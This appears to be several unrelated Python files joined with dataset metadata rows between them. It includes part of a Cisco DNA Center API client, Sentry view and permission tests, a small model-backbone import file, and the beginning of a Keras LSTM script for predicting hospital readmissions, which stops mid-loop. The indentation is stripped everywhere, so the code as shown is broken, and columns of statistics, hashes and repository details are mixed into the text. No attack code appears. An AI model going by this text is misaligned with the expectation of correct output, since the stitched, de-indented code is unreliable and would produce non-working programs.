ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(virtual_network_name, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
'virtualNetworkName':
virtual_network_name,
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/virtual-network')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.get(endpoint_full_url, params=_params,
headers=_headers)
else:
json_data = self._session.get(endpoint_full_url, params=_params)
return self._object_factory('bpm_ea4b1c052b855bd9a0e99f803e6185a5_v2_2_2_3', json_data)
def update_virtual_network_with_scalable_groups(self,
scalableGroupNames=None,
virtualNetworkName=None,
virtualNetworkType=None,
headers=None,
payload=None,
active_validation=True,
**request_parameters):
"""Update virtual network with scalable groups .
Args:
scalableGroupNames(list): SDA's Scalable Group Names (list of strings).
virtualNetworkName(string): SDA's Virtual Network Name.
virtualNetworkType(string): SDA's Virtual Network Type.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
payload(dict): A JSON serializable Python object to send in the
body of the Request.
active_validation(bool): Enable/Disable payload validation.
Defaults to True.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(payload, dict)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
_payload = {
'virtualNetworkName':
virtualNetworkName,
'virtualNetworkType':
virtualNetworkType,
'scalableGroupNames':
scalableGroupNames,
}
_payload.update(payload or {})
_payload = dict_from_items_with_values(_payload)
if active_validation:
self._request_validator('jsd_f9492367570c5f009cf8b5955790e87c_v2_2_2_3')\
.validate(_payload)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/virtual-network')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.put(endpoint_full_url, params=_params,
json=_payload,
headers=_headers)
else:
json_data = self._session.put(endpoint_full_url, params=_params,
json=_payload)
return self._object_factory('bpm_f9492367570c5f009cf8b5955790e87c_v2_2_2_3', json_data)
| 39.861969
| 116
| 0.578349
| 11,365
| 109,740
| 5.310339
| 0.029916
| 0.049576
| 0.037182
| 0.027704
| 0.943399
| 0.925587
| 0.922969
| 0.917517
| 0.904924
| 0.898512
| 0
| 0.020005
| 0.359103
| 109,740
| 2,752
| 117
| 39.876453
| 0.838096
| 0.29815
| 0
| 0.851172
| 0
| 0
| 0.090931
| 0.067071
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028499
| false
| 0
| 0.0038
| 0
| 0.060798
| 0.000633
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
67bfcc1f620ba5d8662087fca10b52873671ae89
| 17,993
|
py
|
Python
|
tests/sentry/web/frontend/tests.py
|
rogerhu/sentry
|
ee2b190e92003abe0f538b2df5b686e425df1200
|
[
"BSD-3-Clause"
] | 1
|
2015-12-13T18:27:54.000Z
|
2015-12-13T18:27:54.000Z
|
tests/sentry/web/frontend/tests.py
|
simmetria/sentry
|
9731f26adb44847d1c883cca108afc0755cf21cc
|
[
"BSD-3-Clause"
] | null | null | null |
tests/sentry/web/frontend/tests.py
|
simmetria/sentry
|
9731f26adb44847d1c883cca108afc0755cf21cc
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import absolute_import
import logging
import json
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from sentry.conf import settings
from sentry.constants import MEMBER_USER
from sentry.models import Group, Project, TeamMember, Team
from sentry.testutils import fixture
from sentry.testutils import TestCase
logger = logging.getLogger(__name__)
class SentryViewsTest(TestCase):
fixtures = ['tests/fixtures/views.json']
@fixture
def user(self):
user = User(username="admin", email="admin@localhost", is_staff=True, is_superuser=True)
user.set_password('password')
user.save()
return user
def test_dashboard(self):
# no projects redirects them to create new project
self.client.login(username=self.user.username, password='password')
resp = self.client.get(reverse('sentry'), follow=True)
self.assertEquals(resp.status_code, 200)
self.assertTemplateUsed(resp, 'sentry/projects/new.html')
# requires at least one project to show dashboard
Project.objects.create(name='foo', owner=self.user)
Project.objects.create(name='bar', owner=self.user).team
resp = self.client.get(reverse('sentry'), follow=True)
self.assertEquals(resp.status_code, 200)
self.assertTemplateUsed(resp, 'sentry/dashboard.html')
# no projects and unauthenticated
self.client.logout()
Project.objects.all().delete()
resp = self.client.get(reverse('sentry'), follow=True)
self.assertEquals(resp.status_code, 200)
self.assertTemplateUsed(resp, 'sentry/login.html')
def test_index(self):
self.client.login(username=self.user.username, password='password')
resp = self.client.get(reverse('sentry', kwargs={'project_id': 1}) + '?sort=freq', follow=False)
self.assertEquals(resp.status_code, 200)
self.assertTemplateUsed(resp, 'sentry/groups/group_list.html')
def test_group_details(self):
self.client.login(username=self.user.username, password='password')
resp = self.client.get(reverse('sentry-group', kwargs={'project_id': 1, 'group_id': 2}), follow=False)
self.assertEquals(resp.status_code, 200, resp.content)
self.assertTemplateUsed(resp, 'sentry/groups/details.html')
self.assertTrue('group' in resp.context)
group = Group.objects.get(pk=2)
self.assertEquals(resp.context['group'], group)
def test_group_event_list(self):
self.client.login(username=self.user.username, password='password')
resp = self.client.get(reverse('sentry-group-events', kwargs={'project_id': 1, 'group_id': 2}), follow=False)
self.assertEquals(resp.status_code, 200, resp.content)
self.assertTemplateUsed(resp, 'sentry/groups/event_list.html')
self.assertTrue('group' in resp.context)
group = Group.objects.get(pk=2)
self.assertEquals(resp.context['group'], group)
def test_group_message_details(self):
self.client.login(username=self.user.username, password='password')
resp = self.client.get(reverse('sentry-group-event', kwargs={'project_id': 1, 'group_id': 2, 'event_id': 4}), follow=True)
self.assertEquals(resp.status_code, 200, resp.content)
self.assertTemplateUsed(resp, 'sentry/groups/event.html')
self.assertTrue('group' in resp.context)
group = Group.objects.get(pk=2)
self.assertEquals(resp.context['group'], group)
def test_group_json_multi(self):
self.client.login(username=self.user.username, password='password')
resp = self.client.get(reverse('sentry-group-events-json', kwargs={'project_id': 1, 'group_id': 2}))
self.assertEquals(resp.status_code, 200)
self.assertEquals(resp['Content-Type'], 'application/json')
self.assertEquals(json.loads(resp.content)[0]['level'], 'error')
resp = self.client.get(reverse('sentry-group-events-json', kwargs={'project_id': 1, 'group_id': 2}), {'limit': 1})
self.assertEquals(resp.status_code, 200)
resp = self.client.get(reverse('sentry-group-events-json', kwargs={'project_id': 1, 'group_id': 2}), {'limit': settings.MAX_JSON_RESULTS + 1})
self.assertEquals(resp.status_code, 400)
def test_group_events_details_json(self):
self.client.login(username=self.user.username, password='password')
resp = self.client.get(reverse('sentry-group-event-json', kwargs={'project_id': 1, 'group_id': 2, 'event_id_or_latest': 'latest'}))
self.assertEquals(resp.status_code, 200)
self.assertEquals(resp['Content-Type'], 'application/json')
self.assertEquals(json.loads(resp.content)['level'], 'error')
def test_status_env(self):
self.client.login(username=self.user.username, password='password')
resp = self.client.get(reverse('sentry-admin-status'), follow=True)
self.assertEquals(resp.status_code, 200)
self.assertTemplateUsed(resp, 'sentry/admin/status/env.html')
def test_status_packages(self):
self.client.login(username=self.user.username, password='password')
resp = self.client.get(reverse('sentry-admin-packages-status'), follow=True)
self.assertEquals(resp.status_code, 200)
self.assertTemplateUsed(resp, 'sentry/admin/status/packages.html')
def test_status_mail(self):
self.client.login(username=self.user.username, password='password')
resp = self.client.get(reverse('sentry-admin-mail-status'), follow=True)
self.assertEquals(resp.status_code, 200)
self.assertTemplateUsed(resp, 'sentry/admin/status/mail.html')
def test_stats(self):
self.client.login(username=self.user.username, password='password')
resp = self.client.get(reverse('sentry-admin-stats'), follow=True)
self.assertEquals(resp.status_code, 200)
self.assertTemplateUsed(resp, 'sentry/admin/stats.html')
def test_manage_users(self):
self.client.login(username=self.user.username, password='password')
resp = self.client.get(reverse('sentry-admin-users'), follow=True)
self.assertEquals(resp.status_code, 200)
self.assertTemplateUsed(resp, 'sentry/admin/users/list.html')
def test_event_list(self):
self.client.login(username=self.user.username, password='password')
resp = self.client.get(reverse('sentry-events', kwargs={'project_id': 1}))
self.assertEquals(resp.status_code, 200)
self.assertTemplateUsed(resp, 'sentry/events/event_list.html')
def test_replay_event(self):
# bad event_id
self.client.login(username=self.user.username, password='password')
resp = self.client.get(reverse('sentry-replay', kwargs={'project_id': 1, 'event_id': 1}))
self.assertEquals(resp.status_code, 302)
# valid params
# self.client.login(username='admin', password='admin')
# resp = self.client.get(reverse('sentry-replay', kwargs={'project_id': 1, 'event_id': 4}))
# self.assertEquals(resp.status_code, 200)
# self.assertTemplateUsed(resp, 'sentry/events/replay.html')
class PermissionBase(TestCase):
"""
These tests simply ensure permission requirements for various views.
"""
fixtures = ['tests/fixtures/views.json']
@fixture
def admin(self):
user = User(username="admin", email="admin@localhost", is_staff=True, is_superuser=True)
user.set_password('admin')
user.save()
return user
@fixture
def member(self):
user = User(username="member", email="member@localhost")
user.set_password('member')
user.save()
TeamMember.objects.create(
user=user,
team=self.team,
type=MEMBER_USER,
)
return user
@fixture
def nobody(self):
user = User(username="nobody", email="nobody@localhost")
user.set_password('nobody')
user.save()
return user
@fixture
def owner(self):
user = User(username="owner", email="owner@localhost")
user.set_password('owner')
user.save()
Team.objects.create(owner=user, name='foo', slug='foo')
return user
@fixture
def tm(self):
return TeamMember.objects.get(user=self.member, team=self.team)
@fixture
def team(self):
return Team.objects.get(owner=self.owner, slug='foo')
@fixture
def project(self):
project = Project.objects.get(id=1)
project.update(public=False, team=self.team)
return project
def _assertPerm(self, path, template, account=None, want=True):
"""
Requests ``path`` and asserts that ``template`` is
rendered for ``account`` (Anonymous if None) given ``want``
is Trueish.
"""
if account:
self.assertTrue(self.client.login(username=account, password=account))
else:
self.client.logout()
resp = self.client.get(path)
if want:
self.assertEquals(resp.status_code, 200)
self.assertTemplateUsed(resp, template)
else:
self.assertEquals(resp.status_code, 302)
self.assertTemplateNotUsed(resp, template)
class ProjectListTest(PermissionBase):
template = 'sentry/projects/list.html'
@fixture
def path(self):
return reverse('sentry-project-list')
def test_admin_can_load(self):
self._assertPerm(self.path, self.template, self.admin.username)
def test_user_can_load(self):
self._assertPerm(self.path, self.template, self.nobody.username)
def test_anonymous_cannot_load(self):
self._assertPerm(self.path, self.template, None, False)
class NewProjectTest(PermissionBase):
template = 'sentry/projects/new.html'
@fixture
def path(self):
return reverse('sentry-new-project')
def test_admin_can_load(self):
with self.Settings(SENTRY_ALLOW_PROJECT_CREATION=False, SENTRY_ALLOW_TEAM_CREATION=False):
self._assertPerm(self.path, self.template, self.admin.username)
def test_user_cannot_load(self):
with self.Settings(SENTRY_ALLOW_PROJECT_CREATION=False, SENTRY_ALLOW_TEAM_CREATION=False):
self._assertPerm(self.path, self.template, self.nobody.username, False)
def test_anonymous_cannot_load(self):
with self.Settings(SENTRY_ALLOW_PROJECT_CREATION=False, SENTRY_ALLOW_TEAM_CREATION=False):
self._assertPerm(self.path, self.template, None, False)
def test_public_creation_admin_can_load(self):
with self.Settings(SENTRY_ALLOW_PROJECT_CREATION=True, SENTRY_ALLOW_TEAM_CREATION=True):
self._assertPerm(self.path, self.template, self.admin.username)
def test_public_creation_user_can_load(self):
with self.Settings(SENTRY_ALLOW_PROJECT_CREATION=True, SENTRY_ALLOW_TEAM_CREATION=True):
self._assertPerm(self.path, self.template, self.nobody.username)
def test_public_anonymous_cannot_load(self):
with self.Settings(SENTRY_ALLOW_PROJECT_CREATION=True, SENTRY_ALLOW_TEAM_CREATION=True):
self._assertPerm(self.path, self.template, None, False)
class ManageProjectTest(PermissionBase):
template = 'sentry/projects/manage.html'
@fixture
def path(self):
return reverse('sentry-manage-project', kwargs={'project_id': self.project.id})
def test_admin_can_load(self):
self._assertPerm(self.path, self.template, self.admin.username)
def test_owner_can_load(self):
self._assertPerm(self.path, self.template, self.owner.username)
def test_anonymous_cannot_load(self):
self._assertPerm(self.path, self.template, None, False)
def test_user_cannot_load(self):
self._assertPerm(self.path, self.template, self.nobody.username, False)
def test_member_cannot_load(self):
self._assertPerm(self.path, self.template, self.member.username, False)
class RemoveProjectTest(PermissionBase):
template = 'sentry/projects/remove.html'
@fixture
def path(self):
return reverse('sentry-remove-project', kwargs={'project_id': self.project.id})
def test_admin_cannot_remove_default(self):
with self.Settings(SENTRY_PROJECT=1):
self._assertPerm(self.path, self.template, self.admin.username, False)
def test_owner_cannot_remove_default(self):
with self.Settings(SENTRY_PROJECT=1):
self._assertPerm(self.path, self.template, self.owner.username, False)
def test_anonymous_cannot_remove_default(self):
with self.Settings(SENTRY_PROJECT=1):
self._assertPerm(self.path, self.template, None, False)
def test_user_cannot_remove_default(self):
with self.Settings(SENTRY_PROJECT=1):
self._assertPerm(self.path, self.template, self.nobody.username, False)
def test_member_cannot_remove_default(self):
with self.Settings(SENTRY_PROJECT=1):
self._assertPerm(self.path, self.template, self.member.username, False)
def test_admin_can_load(self):
with self.Settings(SENTRY_PROJECT=2):
self._assertPerm(self.path, self.template, self.admin.username)
def test_owner_can_load(self):
with self.Settings(SENTRY_PROJECT=2):
self._assertPerm(self.path, self.template, self.owner.username)
def test_anonymous_cannot_load(self):
with self.Settings(SENTRY_PROJECT=2):
self._assertPerm(self.path, self.template, None, False)
def test_user_cannot_load(self):
with self.Settings(SENTRY_PROJECT=2):
self._assertPerm(self.path, self.template, self.nobody.username, False)
def test_member_cannot_load(self):
with self.Settings(SENTRY_PROJECT=2):
self._assertPerm(self.path, self.template, self.member.username, False)
class NewTeamMemberTest(PermissionBase):
template = 'sentry/teams/members/new.html'
@fixture
def path(self):
return reverse('sentry-new-team-member', kwargs={'team_slug': self.team.slug})
def test_admin_can_load(self):
self._assertPerm(self.path, self.template, self.admin.username)
def test_owner_can_load(self):
self._assertPerm(self.path, self.template, self.owner.username)
def test_anonymous_cannot_load(self):
self._assertPerm(self.path, self.template, None, False)
def test_user_cannot_load(self):
self._assertPerm(self.path, self.template, self.nobody.username, False)
def test_member_cannot_load(self):
self._assertPerm(self.path, self.template, self.member.username, False)
class EditTeamMemberTest(PermissionBase):
template = 'sentry/teams/members/edit.html'
@fixture
def path(self):
return reverse('sentry-edit-team-member', kwargs={'team_slug': self.team.slug, 'member_id': self.tm.pk})
def test_admin_can_load(self):
self._assertPerm(self.path, self.template, self.admin.username)
def test_owner_can_load(self):
self._assertPerm(self.path, self.template, self.owner.username)
def test_anonymous_cannot_load(self):
self._assertPerm(self.path, self.template, None, False)
def test_user_cannot_load(self):
self._assertPerm(self.path, self.template, self.nobody.username, False)
def test_member_cannot_load(self):
self._assertPerm(self.path, self.template, self.member.username, False)
class RemoveTeamMemberTest(PermissionBase):
template = 'sentry/teams/members/remove.html'
@fixture
def path(self):
return reverse('sentry-remove-team-member', kwargs={'team_slug': self.team.slug, 'member_id': self.tm.pk})
def test_admin_can_load(self):
self._assertPerm(self.path, self.template, self.admin.username)
def test_owner_can_load(self):
self._assertPerm(self.path, self.template, self.owner.username)
def test_anonymous_cannot_load(self):
self._assertPerm(self.path, self.template, None, False)
def test_user_cannot_load(self):
self._assertPerm(self.path, self.template, self.nobody.username, False)
def test_member_cannot_load(self):
self._assertPerm(self.path, self.template, self.member.username, False)
class SentrySearchTest(TestCase):
def test_checksum_query(self):
checksum = 'a' * 32
g = Group.objects.create(
project_id=1,
logger='root',
culprit='a',
checksum=checksum,
message='hi',
)
with self.Settings(SENTRY_PUBLIC=True):
response = self.client.get(reverse('sentry-search', kwargs={'project_id': 1}), {'q': '%s$%s' % (checksum, checksum)})
self.assertEquals(response.status_code, 302)
self.assertEquals(response['Location'], 'http://testserver%s' % (g.get_absolute_url(),))
def test_dupe_checksum(self):
checksum = 'a' * 32
g1 = Group.objects.create(
project_id=1,
logger='root',
culprit='a',
checksum=checksum,
message='hi',
)
g2 = Group.objects.create(
project_id=1,
logger='root',
culprit='b',
checksum=checksum,
message='hi',
)
with self.Settings(SENTRY_PUBLIC=True, SENTRY_USE_SEARCH=False):
response = self.client.get(reverse('sentry-search', kwargs={'project_id': 1}), {'q': '%s$%s' % (checksum, checksum)})
self.assertEquals(response.status_code, 200)
self.assertTemplateUsed(response, 'sentry/search.html')
context = response.context
self.assertTrue('event_list' in context)
self.assertEquals(len(context['event_list']), 2)
self.assertTrue(g1 in context['event_list'])
self.assertTrue(g2 in context['event_list'])
| 39.200436
| 150
| 0.677764
| 2,221
| 17,993
| 5.336785
| 0.089599
| 0.032481
| 0.060744
| 0.072387
| 0.760145
| 0.745803
| 0.733654
| 0.721168
| 0.705644
| 0.687843
| 0
| 0.008433
| 0.195965
| 17,993
| 458
| 151
| 39.286026
| 0.81088
| 0.034069
| 0
| 0.559524
| 0
| 0
| 0.106722
| 0.047702
| 0
| 0
| 0
| 0
| 0.279762
| 1
| 0.21131
| false
| 0.059524
| 0.029762
| 0.026786
| 0.342262
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
e1e386100ddd38eafbb9893db22af86e9d7a950d
| 188
|
py
|
Python
|
models/backbones/__init__.py
|
hrlblab/SimTriplet
|
66e1198adda88e2f6f146bc9cc570e4bf085c109
|
[
"Apache-2.0"
] | 12
|
2021-03-11T20:39:17.000Z
|
2022-03-17T06:12:27.000Z
|
models/backbones/__init__.py
|
hrlblab/SimTriplet
|
66e1198adda88e2f6f146bc9cc570e4bf085c109
|
[
"Apache-2.0"
] | 3
|
2021-04-14T15:34:00.000Z
|
2022-02-04T13:10:41.000Z
|
models/backbones/__init__.py
|
hrlblab/SimTriplet
|
66e1198adda88e2f6f146bc9cc570e4bf085c109
|
[
"Apache-2.0"
] | 7
|
2021-03-12T01:54:01.000Z
|
2022-02-20T02:57:31.000Z
|
from .cifar_resnet_1 import resnet18 as resnet18_cifar_variant1
from .cifar_resnet_2 import ResNet18 as resnet18_cifar_variant2
from .cifar_resnet_1 import resnet50 as resnet50_TCGA
| 18.8
| 63
| 0.856383
| 29
| 188
| 5.172414
| 0.413793
| 0.18
| 0.3
| 0.213333
| 0.64
| 0
| 0
| 0
| 0
| 0
| 0
| 0.103659
| 0.12766
| 188
| 9
| 64
| 20.888889
| 0.810976
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e1ee3f8702accea8034c7cbe2de6568e7be4efed
| 39,614
|
py
|
Python
|
lstm_predict.py
|
caisr-hh/lstm_predict
|
3e0d49987158b0c1607eca816589143c39ec97fb
|
[
"MIT"
] | 4
|
2020-01-09T22:05:07.000Z
|
2020-10-01T21:08:51.000Z
|
lstm_predict.py
|
caisr-hh/lstm_predict
|
3e0d49987158b0c1607eca816589143c39ec97fb
|
[
"MIT"
] | null | null | null |
lstm_predict.py
|
caisr-hh/lstm_predict
|
3e0d49987158b0c1607eca816589143c39ec97fb
|
[
"MIT"
] | 6
|
2019-08-27T08:55:43.000Z
|
2021-03-01T22:22:31.000Z
|
# -*- coding: utf-8 -*-
"""
Created on Mon Mar 12 08:51:35 2019
@author: aaq109
"""
import timeit
import numpy as np
from numpy import array
from keras.models import *
from keras.layers import *
from keras import backend as K
from keras.callbacks import EarlyStopping, ModelCheckpoint
from keras.preprocessing import sequence
from sklearn.model_selection import train_test_split
from sklearn.metrics import *
from tensorflow.keras.callbacks import EarlyStopping, Callback
from sklearn.metrics import roc_curve, auc
import matplotlib.pyplot as plt
import pandas as pd
from scipy import stats
# Read data
N_visits=15 # Maximum number of inpatient visits in the dataset
def read_data(exp, N_visits):
label='sampledata_lstm_'+str(N_visits)+'.csv'
print('Reading File: ',label)
pidAdmMap = {}
admDetailMap={}
output=[]
Weights=[]
VisitIds=[]
if exp[0:2]=='11':
ind1=6
ind2=202
elif exp[0:2]=='10':
ind1=6
ind2=17
else:
ind1=17
ind2=202
infd = open (label,'r')
infd.readline()
for line in infd:
tokens = line.strip().split(',')
pid=int(tokens[0])
admId=(tokens[1])
det=(tokens[ind1:ind2]) #200 if 185 d2v vector is used
output.append(tokens[5])
Weights.append(tokens[203])
VisitIds.append(tokens[1])
if admId in admDetailMap:
admDetailMap[admId].append(det)
else:
admDetailMap[admId]=det
if pid in pidAdmMap:
pidAdmMap[pid].append(admId)
else:
pidAdmMap[pid]=[admId]
infd.close()
_list = []
for patient in pidAdmMap.keys():
a = [admDetailMap[xx] for xx in pidAdmMap[patient]]
_list.append(a)
X=np.array([np.array(xi) for xi in _list])
a,b,c=X.shape
Y=np.array(output)
Sample_weight=np.array(Weights)
X = X.astype(np.float)
Y = Y.astype(np.float)
Sample_weight = Sample_weight.astype(np.float)
Y=Y.reshape(X.shape[0],N_visits,1)
return X, Y,Sample_weight,VisitIds
def ppv(y_true, y_pred):
true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))
predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))
ppv = true_positives / (predicted_positives + K.epsilon())
return ppv
def npv(y_true, y_pred):
true_negatives = K.sum(K.round(K.clip((1 - y_true) * (1 - y_pred), 0, 1)))
predicted_negatives = K.sum(K.round(K.clip(1-y_pred, 0, 1)))
npv = true_negatives / (predicted_negatives + K.epsilon())
return npv
def sensitivity(y_true, y_pred):
true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))
possible_positives = K.sum(K.round(K.clip(y_true, 0, 1)))
return true_positives / (possible_positives + K.epsilon())
def specificity(y_true, y_pred):
true_negatives = K.sum(K.round(K.clip((1-y_true) * (1-y_pred), 0, 1)))
possible_negatives = K.sum(K.round(K.clip(1-y_true, 0, 1)))
return true_negatives / (possible_negatives + K.epsilon())
def recall(y_true, y_pred):
true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))
possible_positives = K.sum(K.round(K.clip(y_true, 0, 1)))
recall = true_positives / (possible_positives + K.epsilon())
return recall
def model_eval(model, X_test,Y_test, Sample_weight_test,exp,X_train,Y_train,Sample_weight_train):
from sklearn.preprocessing import binarize
from sklearn.metrics import f1_score
from sklearn.metrics import balanced_accuracy_score,accuracy_score
import operator
y_pred = model.predict(X_train).ravel()
y_test=Y_train.ravel()
g=Sample_weight_train.ravel()
g[g==0]=0
g[g>0]=1
indices=np.where(g==0)
y_pred=np.delete(y_pred,indices,0)
y_test=np.delete(y_test,indices,0)
score={}
for thresh in np.arange(0.001,1,0.001):
y_pred_class=binarize([y_pred],thresh)[0]
cm= confusion_matrix(y_test, y_pred_class)
score[thresh]=(48000*cm[1,1]*0.5)-(7000*(cm[1,1]+cm[0,1]))
thresh=max(score.items(), key=operator.itemgetter(1))[0]
y_pred = model.predict(X_test).ravel()
y_test=Y_test.ravel()
g=Sample_weight_test.ravel()
g[g==0]=0
g[g>0]=1
if exp[2]=='1':
fpr, tpr, thetas = roc_curve(y_test, y_pred,sample_weight=g,pos_label=1)
prc, recal, thetas = precision_recall_curve(y_test, y_pred,sample_weight=g)
indices=np.where(g==0) #Patient gender
y_pred=np.delete(y_pred,indices,0)
y_test=np.delete(y_test,indices,0)
else:
fpr, tpr, thetas = roc_curve(y_test, y_pred,pos_label=1)
prc, recal, thetas = precision_recall_curve(y_test, y_pred)
AUC_test = auc(fpr, tpr)
PR_auc = auc(recal,prc)
y_pred=binarize([y_pred],thresh)[0]
cm= confusion_matrix(y_test, y_pred)
cost_saved=(48000*cm[1,1]*0.5)-(7000*(cm[1,1]+cm[0,1]))
Accuracy=(cm[0,0]+cm[1,1])/sum(sum(cm))
Sensitivity_test=cm[1,1]/(cm[1,0]+cm[1,1])
Specificity_test=cm[0,0]/(cm[0,0]+cm[0,1])
F1_score=f1_score(y_test,y_pred)
cost_saved=cost_saved/(np.sum(y_test)*(48000-7000)*0.5)
return Accuracy, AUC_test, Sensitivity_test, Specificity_test, PR_auc, F1_score,cost_saved
def save_print(AUC_test, Sensitivity_test, Specificity_test, PR_auc,F1_score,cost_saved, exp):
label1='AUC_test_'+exp+'.npy'
label2='Sensitivity_test_'+exp+'.npy'
label3='Specificity_test_'+exp+'.npy'
label4='PR_auc_'+exp+'.npy'
label5='f1_score_'+exp+'.npy'
label6='cost_saved_'+exp+'.npy'
np.save(label1, AUC_test)
np.save(label2, Sensitivity_test)
np.save(label3, Specificity_test)
np.save(label4, PR_auc)
np.save(label5, F1_score)
np.save(label6, cost_saved)
val1=np.fromiter(AUC_test.values(), dtype=float)
val2=np.fromiter(Sensitivity_test.values(), dtype=float)
val3=np.fromiter(Specificity_test.values(), dtype=float)
val4=np.fromiter(PR_auc.values(), dtype=float)
val5=np.fromiter(F1_score.values(), dtype=float)
val6=np.fromiter(cost_saved.values(), dtype=float)
print(label1,[np.mean(val1[np.nonzero(val1)]),np.std(val1[np.nonzero(val1)])])
print(label2,[np.mean(val2[np.nonzero(val2)]),np.std(val2[np.nonzero(val2)])])
print(label3,[np.mean(val3[np.nonzero(val3)]),np.std(val3[np.nonzero(val3)])])
print(label4,[np.mean(val4[np.nonzero(val4)]),np.std(val4[np.nonzero(val4)])])
print(label5,[np.mean(val5[np.nonzero(val5)]),np.std(val5[np.nonzero(val5)])])
print(label6,[np.mean(val6[np.nonzero(val6)]),np.std(val6[np.nonzero(val6)])])
return None
## Define different experiments
# 1111 - HDF+MDF+LSTM+CA
exp='1111'
AUC_test={}
Accuracy_test={}
PR_auc={}
Sensitivity_test={}
Specificity_test={}
average_precision={}
F1_score={}
cost_saved={}
#Set Params
W_classA=0 #Dummy visit weights
W_classB=1 #No readmission class weight
W_classC=3 #Readmission class weight
E_pochs=80 # Traning epochs
B_size=32 # Batch size
T_size=0.3 # Samples used for testing
NN_nodes=[128,64,32,1] # Number of nodes in the NN
N_iter=10
X, Y, Sample_weight,VisitIds=read_data(exp, N_visits)
Sample_weight[Sample_weight==0]=W_classA
Sample_weight[Sample_weight==1]=W_classB
Sample_weight[Sample_weight==2]=W_classC
Sample_weight=Sample_weight.reshape(X.shape[0],N_visits,1)
Visits=np.array(VisitIds)
Visits=Visits.reshape(X.shape[0],N_visits,1)
es=EarlyStopping(monitor='val_loss', patience=20, mode='min')
for iter_nm in range(0,N_iter):
print('Iteration ',iter_nm)
X_train, X_test, Y_train, Y_test, Sample_weight_train, Sample_weight_test, Visit_train, Visit_test = train_test_split(X, Y,Sample_weight,Visits, test_size=T_size, shuffle=True)
Sample_weight_train=Sample_weight_train.reshape(len(Sample_weight_train),N_visits)
model = Sequential()
model.add(TimeDistributed(Dense(NN_nodes[0], activation='sigmoid'), input_shape=(N_visits, X.shape[2])))
model.add(LSTM(NN_nodes[1], return_sequences=True))
model.add(TimeDistributed(Dense(NN_nodes[2], activation='sigmoid')))
model.add(TimeDistributed(Dense(NN_nodes[3], activation='sigmoid')))
model.compile(loss='binary_crossentropy', optimizer='rmsprop',sample_weight_mode='temporal', metrics=[sensitivity, specificity, ppv, npv, 'accuracy'])
# print(model.summary())
#np.random.seed(1337)
print('Training start', 'for iteration ', iter_nm )
model.fit(X_train, Y_train, epochs=E_pochs, batch_size=B_size, verbose=0, sample_weight=Sample_weight_train,shuffle=True, validation_split=0.3, callbacks=[es])
print('Training complete', 'for iteration ', iter_nm )
print('Evaluation', 'for iteration ', iter_nm )
Accuracy_test[iter_nm], AUC_test[iter_nm], Sensitivity_test[iter_nm], Specificity_test[iter_nm], PR_auc[iter_nm], F1_score[iter_nm],cost_saved[iter_nm]=model_eval(model, X_test,Y_test, Sample_weight_test,exp,X_train,Y_train,Sample_weight_train)
print('Evaluation complete', 'for iteration ', iter_nm )
save_print(AUC_test, Sensitivity_test, Specificity_test, PR_auc,F1_score,cost_saved, exp)
## Define different experiments
# 1110 - HDF+MDF+LSTM
exp='1110'
AUC_test={}
Accuracy_test={}
PR_auc={}
Sensitivity_test={}
Specificity_test={}
average_precision={}
F1_score={}
cost_saved={}
#Set Params
W_classA=0 #Dummy visit weights
W_classB=1 #No readmission class weight
W_classC=1 #Readmission class weight
E_pochs=80 # Traning epochs
B_size=32 # Batch size
T_size=0.3 # Samples used for testing
NN_nodes=[128,64,32,1] # Number of nodes in the NN
N_iter=10
X, Y, Sample_weight,VisitIds=read_data(exp, N_visits)
Sample_weight[Sample_weight==0]=W_classA
Sample_weight[Sample_weight==1]=W_classB
Sample_weight[Sample_weight==2]=W_classC
Sample_weight=Sample_weight.reshape(X.shape[0],N_visits,1)
Visits=np.array(VisitIds)
Visits=Visits.reshape(X.shape[0],N_visits,1)
for iter_nm in range(0,N_iter):
